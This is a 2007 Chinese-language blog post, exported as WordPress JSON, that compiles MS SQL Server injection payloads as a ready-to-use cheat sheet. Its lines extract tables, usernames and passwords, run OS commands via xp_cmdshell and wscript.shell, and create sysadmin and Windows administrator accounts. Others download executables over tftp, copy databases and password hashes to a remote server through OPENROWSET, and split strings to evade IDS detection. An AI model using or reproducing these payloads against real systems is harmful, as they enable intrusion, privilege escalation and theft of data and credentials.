{"id":168,"date":"2007-07-26T10:04:56","date_gmt":"2007-07-26T02:04:56","guid":{"rendered":"http:\/\/www.liangliang.org.cn\/blog\/?p=168"},"modified":"2007-07-26T10:04:56","modified_gmt":"2007-07-26T02:04:56","slug":"ms-sql%e6%b3%a8%e5%b0%84%e8%b5%84%e6%96%99","status":"publish","type":"post","link":"https:\/\/www.liangliang.org.cn\/?p=168","title":{"rendered":"Ms Sql\u6ce8\u5c04\u8d44\u6599"},"content":{"rendered":"

Ms Sql\u6ce8\u5c04\u8d44\u6599<\/p>\n

Sql\u6ce8\u5c04\u603b\u7ed3<\/p>\n

Sql\u6ce8\u5c04\u603b\u7ed3\uff08\u65e9\u6e90\u4e8e'or'1'='1\uff09<\/p>\n

\u6700\u91cd\u8981\u7684\u8868\u540d\uff1a
\nselect * from sysobjects
\nsysobjects ncsysobjects
\nsysindexes tsysindexes
\nsyscolumns
\nsystypes
\nsysusers
\nsysdatabases
\nsysxlogins
\nsysprocesses<\/p>\n

\u6700\u91cd\u8981\u7684\u4e00\u4e9b\u7528\u6237\u540d\uff08\u9ed8\u8ba4sql\u6570\u636e\u5e93\u4e2d\u5b58\u5728\u7740\u7684\uff09
\npublic
\ndbo
\nguest(\u4e00\u822c\u7981\u6b62\uff0c\u6216\u8005\u6ca1\u6743\u9650)
\ndb_sercurityadmin
\nab_dlladmin<\/p>\n

\u4e00\u4e9b\u9ed8\u8ba4\u6269\u5c55<\/p>\n

xp_regaddmultistring
\nxp_regdeletekey
\nxp_regdeletevalue
\nxp_regenumkeys
\nxp_regenumvalues
\nxp_regread
\nxp_regremovemultistring
\nxp_regwrite
\nxp_availablemedia \u9a71\u52a8\u5668\u76f8\u5173
\nxp_dirtree \u76ee\u5f55
\nxp_enumdsn ODBC\u8fde\u63a5
\nxp_loginconfig \u670d\u52a1\u5668\u5b89\u5168\u6a21\u5f0f\u4fe1\u606f
\nxp_makecab \u521b\u5efa\u538b\u7f29\u5377
\nxp_ntsec_enumdomains domain\u4fe1\u606f
\nxp_terminate_process \u7ec8\u7aef\u8fdb\u7a0b\uff0c\u7ed9\u51fa\u4e00\u4e2aPID<\/p>\n

\u4f8b\u5982\uff1a
\nsp_addextendedproc 'xp_webserver', 'c:\\temp\\xp_foo.dll'
\nexec xp_webserver
\nsp_dropextendedproc 'xp_webserver'
\nbcp \"select * FROM test..foo\" queryout c:\\inetpub\\wwwroot\\runcommand.asp -c -Slocalhost -Usa -Pfoobar
\n' group by users.id having 1=1-
\n' group by users.id, users.username, users.password, users.privs having 1=1-
\n'; insert into users values( 666, 'attacker', 'foobar', 0xffff )-<\/p>\n

union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'-
\nunion select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')-
\nunion select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')-
\nunion select TOP 1 login_name FROM logintable-
\nunion select TOP 1 password FROM logintable where login_name='Rahul'--
\n\u6784\u9020\u8bed\u53e5\uff1a\u67e5\u8be2\u662f\u5426\u5b58\u5728xp_cmdshell
\n' union select @@version,1,1,1--
\nand 1=(select @@VERSION)
\nand 'sa'=(select System_user)
\n' union select ret,1,1,1 from foo--
\n' union select min(username),1,1,1 from users where username > 'a'-
\n' union select min(username),1,1,1 from users where username > 'admin'-
\n' union select password,1,1,1 from users where username = 'admin'--
\nand user_name()='dbo'
\nand 0<>(select user_name()-
\n; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C\uff1a\\WINNT\\system32\\cmd.exe \/c net user swap 5245886 \/add'
\nand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
\n;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'<\/p>\n

1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')
\nand 1=(select IS_SRVROLEMEMBER('sysadmin')) \u5224\u65adsa\u6743\u9650\u662f\u5426
\nand 0<>(select top 1 paths from newtable)-- \u66b4\u5e93\u5927\u6cd5
\nand 1=(select name from master.dbo.sysdatabases where dbid=7) \u5f97\u5230\u5e93\u540d\uff08\u4ece1\u52305\u90fd\u662f\u7cfb\u7edf\u7684id\uff0c6\u4ee5\u4e0a\u624d\u53ef\u4ee5\u5224\u65ad\uff09
\n\u521b\u5efa\u4e00\u4e2a\u865a\u62df\u76ee\u5f55E\u76d8\uff1a
\ndeclare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c\uff1a\\inetpub\\wwwroot\\mkwebdir.vbs -w \"\u9ed8\u8ba4 Web \u7ad9\u70b9\" -v \"e\",\"e\uff1a\\\"'
\n\u8bbf\u95ee\u5c5e\u6027\uff1a\uff08\u914d\u5408\u5199\u5165\u4e00\u4e2awebshell\uff09
\ndeclare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c\uff1a\\inetpub\\wwwroot\\chaccess.vbs -a w3svc\/1\/ROOT\/e +browse'<\/p>\n

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
\n\u4f9d\u6b21\u63d0\u4ea4 dbid = 7,8,9.... \u5f97\u5230\u66f4\u591a\u7684\u6570\u636e\u5e93\u540d
\nand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') \u66b4\u5230\u4e00\u4e2a\u8868 \u5047\u8bbe\u4e3a admin<\/p>\n

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) \u6765\u5f97\u5230\u5176\u4ed6\u7684\u8868\u3002
\nand 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'
\nand uid>(str(id))) \u66b4\u5230UID\u7684\u6570\u503c\u5047\u8bbe\u4e3a18779569 uid=id
\nand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) \u5f97\u5230\u4e00\u4e2aadmin\u7684\u4e00\u4e2a\u5b57\u6bb5,\u5047\u8bbe\u4e3a user_id
\nand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
\n('id',...)) \u6765\u66b4\u51fa\u5176\u4ed6\u7684\u5b57\u6bb5
\nand 0<(select user_id from BBS.dbo.admin where username>1) \u53ef\u4ee5\u5f97\u5230\u7528\u6237\u540d
\n\u4f9d\u6b21\u53ef\u4ee5\u5f97\u5230\u5bc6\u7801\u3002\u3002\u3002\u3002\u3002\u5047\u8bbe\u5b58\u5728user_id username ,password \u7b49\u5b57\u6bb5<\/p>\n

Show.asp&id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
\nShow.asp&id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
\n(union\u8bed\u53e5\u5230\u5904\u98ce\u9761\u554a\uff0caccess\u4e5f\u597d\u7528<\/p>\n

\u66b4\u5e93\u7279\u6b8a\u6280\u5de7\uff1a:%5c='\\' \u6216\u8005\u628a\/\u548c\\ \u4fee\u6539%5\u63d0\u4ea4
\nand 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
\nand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') \u5f97\u5230\u8868\u540d
\nand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))
\nand 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) \u5224\u65adid\u503c
\nand 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) \u6240\u6709\u5b57\u6bb5<\/p>\n

http:\/\/xx.xx.xx.xx\/111.asp&id=3400;create table [dbo].[swap] ([swappass][char](255));--<\/p>\n

http:\/\/xx.xx.xx.xx\/111.asp&id=3400 and (select top 1 swappass from swap)=1
\n;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters\\Virtual Roots\\', @value_name='\/', values=@test OUTPUT insert into paths(path) values(@test)<\/p>\n

http:\/\/61.131.96.39\/PageShow.asp&TianName=\u653f\u7b56\u6cd5\u89c4&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20\"wscript.shell\",@s%20out;exec%20sp_oamethod%20@s,\"run\",NULL,\"cmd.exe%20\/c%20ping%201.1.1.1\";--<\/p>\n

\u5f97\u5230\u4e86web\u8def\u5f84d:\\xxxx,\u63a5\u4e0b\u6765\uff1a
\nhttp:\/\/xx.xx.xx.xx\/111.asp&id=3400;use ku1;--
\nhttp:\/\/xx.xx.xx.xx\/111.asp&id=3400;create table cmd (str image);--<\/p>\n

\u4f20\u7edf\u7684\u5b58\u5728xp_cmdshell\u7684\u6d4b\u8bd5\u8fc7\u7a0b\uff1a
\n;exec master..xp_cmdshell 'dir'
\n;exec master.dbo.sp_addlogin hax;--
\n;exec master.dbo.sp_password null,hax,hax;--
\n;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
\n;exec master.dbo.xp_cmdshell 'net user hax 5258 \/workstations:* \/times:all \/passwordchg:yes \/passwordreq:yes \/active:yes \/add';--
\n;exec master.dbo.xp_cmdshell 'net localgroup administrators hax \/add';--
\nexec master..xp_servicecontrol 'start', 'schedule'
\nexec master..xp_servicecontrol 'start', 'server'
\nhttp\uff1a\/\/www.xxx.com\/list.asp&classid=1; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C\uff1a\\WINNT\\system32\\cmd.exe \/c net user swap 5258 \/add'
\n;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C\uff1a\\WINNT\\system32\\cmd.exe \/c net localgroup administrators swap\/add'<\/p>\n

http:\/\/localhost\/show.asp&id=1'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-<\/p>\n

declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\\'
\ndeclare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\\'
\n;declare @a;set @a=db_name();backup database @a to disk='\u4f60\u7684IP\u4f60\u7684\u5171\u4eab\u76ee\u5f55bak.dat'
\n\u5982\u679c\u88ab\u9650\u5236\u5219\u53ef\u4ee5\u3002
\nselect * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax')
\n\u4f20\u7edf\u67e5\u8be2\u6784\u9020\uff1a
\nselect * FROM news where id=... AND topic=... AND .....
\nadmin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>'
\nselect 123;--
\n;use master;--
\n:a' or name like 'fff%';-- \u663e\u793a\u6709\u4e00\u4e2a\u53ebffff\u7684\u7528\u6237\u54c8\u3002
\n'and 1<>(select count(email) from [user]);--
\n;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
\n\u8bf4\u660e:
\n\u4e0a\u9762\u7684\u8bed\u53e5\u662f\u5f97\u5230\u6570\u636e\u5e93\u4e2d\u7684\u7b2c\u4e00\u4e2a\u7528\u6237\u8868,\u5e76\u628a\u8868\u540d\u653e\u5728ffff\u7528\u6237\u7684\u90ae\u7bb1\u5b57\u6bb5\u4e2d\u3002
\n\u901a\u8fc7\u67e5\u770bffff\u7684\u7528\u6237\u8d44\u6599\u53ef\u5f97\u7b2c\u4e00\u4e2a\u7528\u8868\u53ebad
\n\u7136\u540e\u6839\u636e\u8868\u540dad\u5f97\u5230\u8fd9\u4e2a\u8868\u7684ID
\nffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--<\/p>\n

\u8c61\u4e0b\u9762\u8fd9\u6837\u5c31\u53ef\u4ee5\u5f97\u5230\u7b2c\u4e8c\u4e2a\u8868\u7684\u540d\u5b57\u4e86
\nffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
\nffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--
\nffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--<\/p>\n

ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--<\/p>\n

exec master..xp_servicecontrol 'start', 'schedule'
\nexec master..xp_servicecontrol 'start', 'server'
\nsp_addextendedproc 'xp_webserver', 'c:\\temp\\xp_foo.dll'
\n\u6269\u5c55\u5b58\u50a8\u5c31\u53ef\u4ee5\u901a\u8fc7\u4e00\u822c\u7684\u65b9\u6cd5\u8c03\u7528\uff1a
\nexec xp_webserver
\n\u4e00\u65e6\u8fd9\u4e2a\u6269\u5c55\u5b58\u50a8\u6267\u884c\u8fc7\uff0c\u53ef\u4ee5\u8fd9\u6837\u5220\u9664\u5b83:
\nsp_dropextendedproc 'xp_webserver'<\/p>\n

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-<\/p>\n

insert into users values( 667,123,123,0xffff)-<\/p>\n

insert into users values ( 123, 'admin''--', 'password', 0xffff)-<\/p>\n

;and user>0
\n;;and (select count(*) from sysobjects)>0
\n;;and (select count(*) from mysysobjects)>0 \/\/\u4e3aaccess\u6570\u636e\u5e93<\/p>\n

-----------------------------------------------------------\u901a\u5e38\u6ce8\u5c04\u7684\u4e00\u4e9b\u4ecb\u7ecd\uff1a
\nA) ID=49 \u8fd9\u7c7b\u6ce8\u5165\u7684\u53c2\u6570\u662f\u6570\u5b57\u578b\uff0cSQL\u8bed\u53e5\u539f\u8c8c\u5927\u81f4\u5982\u4e0b\uff1a
\nselect * from \u8868\u540d where \u5b57\u6bb5=49
\n\u6ce8\u5165\u7684\u53c2\u6570\u4e3aID=49 And [\u67e5\u8be2\u6761\u4ef6]\uff0c\u5373\u662f\u751f\u6210\u8bed\u53e5\uff1a
\nselect * from \u8868\u540d where \u5b57\u6bb5=49 And [\u67e5\u8be2\u6761\u4ef6]<\/p>\n

(B) Class=\u8fde\u7eed\u5267 \u8fd9\u7c7b\u6ce8\u5165\u7684\u53c2\u6570\u662f\u5b57\u7b26\u578b\uff0cSQL\u8bed\u53e5\u539f\u8c8c\u5927\u81f4\u6982\u5982\u4e0b\uff1a
\nselect * from \u8868\u540d where \u5b57\u6bb5='\u8fde\u7eed\u5267'
\n\u6ce8\u5165\u7684\u53c2\u6570\u4e3aClass=\u8fde\u7eed\u5267' and [\u67e5\u8be2\u6761\u4ef6] and ''=' \uff0c\u5373\u662f\u751f\u6210\u8bed\u53e5\uff1a
\nselect * from \u8868\u540d where \u5b57\u6bb5='\u8fde\u7eed\u5267' and [\u67e5\u8be2\u6761\u4ef6] and ''=''
\n(C) \u641c\u7d22\u65f6\u6ca1\u8fc7\u6ee4\u53c2\u6570\u7684\uff0c\u5982keyword=\u5173\u952e\u5b57\uff0cSQL\u8bed\u53e5\u539f\u8c8c\u5927\u81f4\u5982\u4e0b\uff1a
\nselect * from \u8868\u540d where \u5b57\u6bb5like '%\u5173\u952e\u5b57%'
\n\u6ce8\u5165\u7684\u53c2\u6570\u4e3akeyword=' and [\u67e5\u8be2\u6761\u4ef6] and '%25'='\uff0c \u5373\u662f\u751f\u6210\u8bed\u53e5\uff1a
\nselect * from \u8868\u540d where\u5b57\u6bb5like '%' and [\u67e5\u8be2\u6761\u4ef6] and '%'='%'
\n;;and (select Top 1 name from sysobjects where xtype='U' and status>0)>0
\nsysobjects\u662fSQLServer\u7684\u7cfb\u7edf\u8868\uff0c\u5b58\u50a8\u7740\u6240\u6709\u7684\u8868\u540d\u3001\u89c6\u56fe\u3001\u7ea6\u675f\u53ca\u5176\u5b83\u5bf9\u8c61\uff0cxtype='U' and status>0\uff0c\u8868\u793a\u7528\u6237\u5efa\u7acb\u7684\u8868\u540d\uff0c\u4e0a\u9762\u7684\u8bed\u53e5\u5c06\u7b2c\u4e00\u4e2a\u8868\u540d\u53d6\u51fa\uff0c\u4e0e0\u6bd4\u8f83\u5927\u5c0f\uff0c\u8ba9\u62a5\u9519\u4fe1\u606f\u628a\u8868\u540d\u66b4\u9732\u51fa\u6765\u3002
\n;;and (select Top 1 col_name(object_id('\u8868\u540d'),1) from sysobjects)>0
\n\u4ece\u2464\u62ff\u5230\u8868\u540d\u540e\uff0c\u7528object_id('\u8868\u540d')\u83b7\u53d6\u8868\u540d\u5bf9\u5e94\u7684\u5185\u90e8ID\uff0ccol_name(\u8868\u540dID,1)\u4ee3\u8868\u8be5\u8868\u7684\u7b2c1\u4e2a\u5b57\u6bb5\u540d\uff0c\u5c061\u6362\u62102,3,4...\u5c31\u53ef\u4ee5\u9010\u4e2a\u83b7\u53d6\u6240\u731c\u89e3\u8868\u91cc\u9762\u7684\u5b57\u6bb5\u540d\u3002<\/p>\n

post.htm\u5185\u5bb9\uff1a\u4e3b\u8981\u662f\u65b9\u4fbf\u8f93\u5165\u3002
\n<iframe name=p src=# width=800 height=350 frameborder=0><\/iframe>
\n<br>
\n<form action=http:\/\/test.com\/count.asp target=p>
\n<input name=\"id\" value=\"1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--\" style=\"width:750\">
\n<input type=submit value=\">>>\">
\n<input type=hidden name=fno value=\"2, 3\">
\n<\/form>
\n\u679a\u4e3e\u51fa\u4ed6\u7684\u6570\u636e\u8868\u540d\uff1a
\nid=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
\n\u8fd9\u662f\u5c06\u7b2c\u4e00\u4e2a\u8868\u540d\u66f4\u65b0\u5230aaa\u7684\u5b57\u6bb5\u5904\u3002
\n\u8bfb\u51fa\u7b2c\u4e00\u4e2a\u8868\uff0c\u7b2c\u4e8c\u4e2a\u8868\u53ef\u4ee5\u8fd9\u6837\u8bfb\u51fa\u6765\uff08\u5728\u6761\u4ef6\u540e\u52a0\u4e0a and name<>'\u521a\u624d\u5f97\u5230\u7684\u8868\u540d'\uff09\u3002
\nid=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--
\n\u7136\u540eid=1552 and exists(select * from aaa where aaa>5)
\n\u8bfb\u51fa\u7b2c\u4e8c\u4e2a\u8868\uff0c^^^^^^\u4e00\u4e2a\u4e2a\u7684\u8bfb\u51fa\uff0c\u76f4\u5230\u6ca1\u6709\u4e3a\u6b62\u3002
\n\u8bfb\u5b57\u6bb5\u662f\u8fd9\u6837\uff1a
\nid=1552;update aaa set aaa=(select top 1 col_name(object_id('\u8868\u540d'),1));--
\n\u7136\u540eid=1552 and exists(select * from aaa where aaa>5)\u51fa\u9519\uff0c\u5f97\u5230\u5b57\u6bb5\u540d
\nid=1552;update aaa set aaa=(select top 1 col_name(object_id('\u8868\u540d'),2));--
\n\u7136\u540eid=1552 and exists(select * from aaa where aaa>5)\u51fa\u9519\uff0c\u5f97\u5230\u5b57\u6bb5\u540d
\n--------------------------------\u9ad8\u7ea7\u6280\u5de7\uff1a
\n[\u83b7\u5f97\u6570\u636e\u8868\u540d][\u5c06\u5b57\u6bb5\u503c\u66f4\u65b0\u4e3a\u8868\u540d\uff0c\u518d\u60f3\u6cd5\u8bfb\u51fa\u8fd9\u4e2a\u5b57\u6bb5\u7684\u503c\u5c31\u53ef\u5f97\u5230\u8868\u540d]
\nupdate \u8868\u540d set \u5b57\u6bb5=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'\u4f60\u5f97\u5230\u7684\u8868\u540d' \u67e5\u51fa\u4e00\u4e2a\u52a0\u4e00\u4e2a]) [ where \u6761\u4ef6]
\nselect top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',\u2026)
\n\u901a\u8fc7SQLSERVER\u6ce8\u5165\u6f0f\u6d1e\u5efa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u5e10\u53f7\u548c\u7cfb\u7edf\u7ba1\u7406\u5458\u5e10\u53f7[\u5f53\u524d\u5e10\u53f7\u5fc5\u987b\u662fSYSADMIN\u7ec4]<\/p>\n

[\u83b7\u5f97\u6570\u636e\u8868\u5b57\u6bb5\u540d][\u5c06\u5b57\u6bb5\u503c\u66f4\u65b0\u4e3a\u5b57\u6bb5\u540d\uff0c\u518d\u60f3\u6cd5\u8bfb\u51fa\u8fd9\u4e2a\u5b57\u6bb5\u7684\u503c\u5c31\u53ef\u5f97\u5230\u5b57\u6bb5\u540d]
\nupdate \u8868\u540d set \u5b57\u6bb5=(select top 1 col_name(object_id('\u8981\u67e5\u8be2\u7684\u6570\u636e\u8868\u540d'),\u5b57\u6bb5\u5217\u5982:1) [ where \u6761\u4ef6]<\/p>\n

\u7ed5\u8fc7IDS\u7684\u68c0\u6d4b[\u4f7f\u7528\u53d8\u91cf]
\ndeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\\'
\ndeclare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\\'<\/p>\n

1\u3001 \u5f00\u542f\u8fdc\u7a0b\u6570\u636e\u5e93
\n\u57fa\u672c\u8bed\u6cd5
\nselect * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )
\n\u53c2\u6570: (1) OLEDB Provider name
\n2\u3001 \u5176\u4e2d\u8fde\u63a5\u5b57\u7b26\u4e32\u53c2\u6570\u53ef\u4ee5\u662f\u4efb\u4f55\u548c\u7aef\u53e3\u7528\u6765\u8fde\u63a5,\u6bd4\u5982
\nselect * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table'<\/p>\n

\u8981\u590d\u5236\u76ee\u6807\u4e3b\u673a\u7684\u6574\u4e2a\u6570\u636e\u5e93\uff0c\u9996\u5148\u8981\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u548c\u81ea\u5df1\u673a\u5668\u4e0a\u7684\u6570\u636e\u5e93\u5efa\u7acb\u8fde\u63a5(\u5982\u4f55\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u5efa\u7acb\u8fdc\u7a0b\u8fde\u63a5\uff0c\u521a\u624d\u5df2\u7ecf\u8bb2\u4e86),\u4e4b\u540einsert\u6240\u6709\u8fdc\u7a0b\u8868\u5230\u672c\u5730\u8868\u3002<\/p>\n

\u57fa\u672c\u8bed\u6cd5\uff1a
\ninsert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1') select * from table2
\n\u8fd9\u884c\u8bed\u53e5\u5c06\u76ee\u6807\u4e3b\u673a\u4e0atable2\u8868\u4e2d\u7684\u6240\u6709\u6570\u636e\u590d\u5236\u5230\u8fdc\u7a0b\u6570\u636e\u5e93\u4e2d\u7684table1\u8868\u4e2d\u3002\u5b9e\u9645\u8fd0\u7528\u4e2d\u9002\u5f53\u4fee\u6539\u8fde\u63a5\u5b57\u7b26\u4e32\u7684IP\u5730\u5740\u548c\u7aef\u53e3\uff0c\u6307\u5411\u9700\u8981\u7684\u5730\u65b9\uff0c\u6bd4\u5982\uff1a
\ninsert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table1') select * from table2<\/p>\n

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysdatabases')
\nselect * from master.dbo.sysdatabases<\/p>\n

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysobjects')
\nselect * from user_database.dbo.sysobjects<\/p>\n

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _syscolumns')
\nselect * from user_database.dbo.syscolumns<\/p>\n

\u4e4b\u540e\uff0c\u4fbf\u53ef\u4ee5\u4ece\u672c\u5730\u6570\u636e\u5e93\u4e2d\u770b\u5230\u76ee\u6807\u4e3b\u673a\u7684\u5e93\u7ed3\u6784\uff0c\u8fd9\u5df2\u7ecf\u6613\u5982\u53cd\u638c\uff0c\u4e0d\u591a\u8bb2\uff0c\u590d\u5236\u6570\u636e\u5e93\uff1a
\ninsert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table1') select * from database..table1<\/p>\n

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table2') select * from database..table2<\/p>\n

......<\/p>\n

3\u3001 \u590d4\u3001 \u5236\u54c8\u897f\u8868\uff08HASH\uff09<\/p>\n

\u8fd9\u5b9e\u9645\u4e0a\u662f\u4e0a\u8ff0\u590d5\u3001 \u5236\u6570\u636e\u5e93\u7684\u4e00\u4e2a\u6269\u5c55\u5e94\u7528\u3002\u767b\u5f55\u5bc6\u7801\u7684hash\u5b58\u50a8\u4e8esysxlogins\u4e2d\u3002\u65b9\u6cd5\u5982\u4e0b\uff1a
\ninsert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins
\n\u5f97\u5230hash\u4e4b\u540e\uff0c6\u3001 \u5c31\u53ef\u4ee5\u8fdb\u884c\u66b4\u529b\u7834\u89e3\u3002\u8fd9\u9700\u8981\u4e00\u70b9\u8fd0\u6c14\u548c\u5927\u91cf\u65f6\u95f4\u3002<\/p>\n

\u904d\u5386\u76ee\u5f55\u7684\u65b9\u6cd5\uff1a
\n\u5148\u521b\u5efa\u4e00\u4e2a\u4e34\u65f6\u8868\uff1atemp
\n'5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
\n5';insert temp exec master.dbo.xp_availablemedia;-- \u83b7\u5f97\u5f53\u524d\u6240\u6709\u9a71\u52a8\u5668
\n5';insert into temp(id) exec master.dbo.xp_subdirs 'c:\\';-- \u83b7\u5f97\u5b50\u76ee\u5f55\u5217\u8868
\n5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\\';-- \u83b7\u5f97\u6240\u6709\u5b50\u76ee\u5f55\u7684\u76ee\u5f55\u6811\u7ed3\u6784,\u5e76\u5bf8\u5165temp\u8868\u4e2d<\/p>\n

5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\\web\\index.asp';-- \u67e5\u770b\u67d0\u4e2a\u6587\u4ef6\u7684\u5185\u5bb9
\n5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\\';--
\n5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\\ *.asp \/s\/a';--
\n5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs enum w3svc'<\/p>\n

5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\\';-- \uff08xp_dirtree\u9002\u7528\u6743\u9650PUBLIC\uff09
\n\u5199\u5165\u8868\uff1a
\n\u8bed\u53e51\uff1ahttp:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30001=(select IS_SRVROLEMEMBER('sysadmin'));--
\n\u8bed\u53e52\uff1ahttp:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30001=(select IS_SRVROLEMEMBER('serveradmin'));--
\n\u8bed\u53e53\uff1ahttp:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30001=(select IS_SRVROLEMEMBER('setupadmin'));--
\n\u8bed\u53e54\uff1ahttp:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30001=(select IS_SRVROLEMEMBER('securityadmin'));--
\n\u8bed\u53e55\uff1ahttp:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30001=(select IS_SRVROLEMEMBER('securityadmin'));--
\n\u8bed\u53e56\uff1ahttp:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30001=(select IS_SRVROLEMEMBER('diskadmin'));--
\n\u8bed\u53e57\uff1ahttp:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30001=(select IS_SRVROLEMEMBER('bulkadmin'));--
\n\u8bed\u53e58\uff1ahttp:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30001=(select IS_SRVROLEMEMBER('bulkadmin'));--
\n\u8bed\u53e59\uff1ahttp:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30001=(select IS_MEMBER('db_owner'));--
\n\u628a\u8def\u5f84\u5199\u5230\u8868\u4e2d\u53bb\uff1a
\nhttp:\/\/www.xxxxx.com\/down\/list.asp&id=1;create\u3000table\u3000dirs(paths varchar(100), id int)-
\nhttp:\/\/http:\/\/www.xxxxx.com\/down\/list.asp&id=1;insert \u3000dirs\u3000exec\u3000master.dbo.xp_dirtree 'c:\\'-
\nhttp:\/\/http:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30000<>(select\u3000top\u30001\u3000paths\u3000from\u3000dirs)-
\nhttp:\/\/http:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30000<>(select\u3000top\u30001\u3000paths\u3000from\u3000dirs\u3000where\u3000paths\u3000not\u3000in('@Inetpub'))-
